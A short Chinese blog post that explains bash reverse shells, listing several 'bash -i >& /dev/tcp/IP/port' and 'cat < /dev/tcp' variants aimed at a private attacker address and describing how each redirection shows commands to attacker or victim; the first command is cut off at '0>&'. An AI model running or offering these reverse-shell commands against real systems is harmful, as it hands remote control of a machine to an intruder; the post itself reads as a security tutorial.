/** 鼠标样式 **/

反弹shell

参考链接:
https://xz.aliyun.com/t/2549?time__1311=n4%2BxnieDqxgDcDUrxBLb%2BLH44mhrYD&alichlgref=https%3A%2F%2Fchenlvtang.top%2F

1.攻击者拿到受害者shell

bash -i >& /dev/tcp/192.168.232.128/2333 0>&

-i表示产生交互的shell
/dev/tcp/ip/port

'> &'

表示将标准输入和标准错误输出重定向到文件(目的:为了不在受害者终端中显示执行的命令)
当>&后边接文件时,表示将表示将标准输入输出重定向到文件
当>&后边接文件描述符时,表示讲前面的文件描述符重定向到后边的文件描述符

/dev/tcp|udp/ip/port

这个文件是特别特殊的,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的,但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信

文件描述符

0 - stdin,代表标准输入
1 - stdout,代表标准输出
2 - stderr,代表标准错误输出

0>&1

将标准输入重定向到标准输出

2.攻击者的输入会同时显示到受害者的输出和自身

cat < /dev/tcp/192.168.232.128/2333

3.受害者的命名会显示到攻击者的界面

bash -i > /dev/tcp/192.168.232.128/2333

4.攻击者对受害者的命令会显示到攻击者页面,指令同时显示给两者

bash -i > /dev/tcp/192.168.232.128/2333 0>&1

5.攻击者对受害者的命令会显示到攻击者页面,指令只有攻击者看的见

bash -i >& /dev/tcp/192.168.232.128/2333 0>&1

posted @ 2024-04-17 11:45  aliex23k65  阅读(460)  评论(0)    收藏  举报